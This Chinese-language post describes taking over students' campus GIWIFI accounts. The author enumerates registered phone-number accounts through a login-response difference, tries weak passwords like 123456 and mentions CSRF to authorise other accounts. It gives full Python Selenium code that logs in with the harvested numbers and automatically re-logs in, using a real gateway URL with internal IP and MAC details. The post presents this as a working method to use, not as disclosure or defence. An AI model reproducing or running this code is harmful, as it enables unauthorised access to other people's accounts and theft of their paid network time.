发现思路:
账号:
1、我所在的学校使用 GIWIFI 的校园网解决方案,登陆账号为学生本人的手机号。学校学生使用的手机号均为学校内运营商入学时发放的校园卡,均处在一个号段,每个账号每天拥有 15 分钟的免费时长。 2、手机号如果注册过 GIWIFI,正确登陆后便可使用互联网服务。如果账号未注册 GIWIFI,使用任意密码登录后便会要求填写身份信息。根据这项区别便可使用手机号段字典爆破出注册过的账号。
密码:
GIWIFI 官方要求使用的密码为 6 位及以上,所以使用弱口令字典进行爆破。
登陆:
有了账号和密码,便需要解决登陆问题。我的思路是使用 python 进行自动登录。同时可以使用 CSRF 攻击实现越权对其他账号上网状态进行授权
实现过程:
1、使用 python 的 webdriver 库,自动打开校园网的登陆链接。
wd = webdriver.Chrome()
wd.implicitly_wait(10)
wd.set_page_load_timeout(10)
wd.get("http://login.gwifi.com.cn/cmps/admin.php/api/login/?
gw_address=172.16.1.5&gw_port=8060&gw_id=GWIFI-qingdaoshankedaD2&ip=172.17.142.232&mac=F0:18:98:19:70:D9&url=http://www.baidu.com?ua=Mozilla&apmac=00:0b:ab:f1:c6:d4&ssid=")
wd.maximize_window()
最后一行代码指定 python 调用浏览器后的显示方式为最大化,如果要静默使用可以将 maximize 换成 minimize
2、传递用户名密码参数,并点击登陆
name_input = wd.find_element_by_id('first_name') # 找到用户名的框框.
pass_input = wd.find_element_by_id('first_password')
login_button = wd.find_element_by_id('first_button')
name_input.clear()
name_input.send_keys(phonenumber[0]) # 填写用户名
time.sleep(0.2)
pass_input.clear()
pass_input.send_keys(123456) # 填写密码
time.sleep(0.2)
login_button.click() # 点击登录
wd.implicitly_wait(4)
wd.quit()
3、其他工作
·关于用户名密码,我选择的方式是存在文件里,然后使用 python 读文件的方式向网页中传递参数。
·关于 wd 库,之所以选择 wd 库是因为这样可以看到登陆的状态,若果选择通过 requests 库直接传递参数,便不会在第一时间发现网络连接不通畅和详细的问题。
·关于自动登录,使用 sh 的 ping 命令原理,新建脚本,每五分钟运行一次,断网后自动调用 python 脚本。
全部代码:
# -*- coding:utf-8 -*-
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
import time
# option=webdriver.ChromeOptions()
# option.add_argument('--headless')
# option.add_argument('--no-sandbox')
# option.add_argument('--start-maximized')
# wd = webdriver.Chrome(chrome_options=option)
wd = webdriver.Chrome()
wd.implicitly_wait(10)
wd.set_page_load_timeout(10)
wd.get("http://login.gwifi.com.cn/cmps/admin.php/api/login/?gw_address=172.16.1.5&gw_port=8060&gw_id=GWIFI-qingdaoshankedaD2&ip=172.17.142.232&mac=F0:18:98:19:70:D9&url=http://www.baidu.com?ua=Mozilla&apmac=00:0b:ab:f1:c6:d4&ssid=")
wd.maximize_window()
file = open("giwifi2.txt")
phonenumber = file.readlines()
for i in range(len(phonenumber)):
phonenumber[i] = phonenumber[i].replace("\n","")
pass
# print(phonenumber[0])
# print(type(phonenumber))
"""这段可以查看selenium的源码,属于smart wait"""
name_input = wd.find_element_by_id('first_name') # 找到用户名的框框
pass_input = wd.find_element_by_id('first_password')
login_button = wd.find_element_by_id('first_button')
name_input.clear()
name_input.send_keys(phonenumber[0]) # 填写用户名
time.sleep(0.2)
pass_input.clear()
pass_input.send_keys(123456) # 填写密码
time.sleep(0.2)
login_button.click() # 点击登录
wd.implicitly_wait(4)
wd.quit()
print (phonenumber[0])
del phonenumber[0]
file.close()
file = open("giwifi2.txt", "w")
for i in range(len(phonenumber)):
file.write(phonenumber[i])
file.write("\n")
pass
file.close()
print ("All Done")
exit()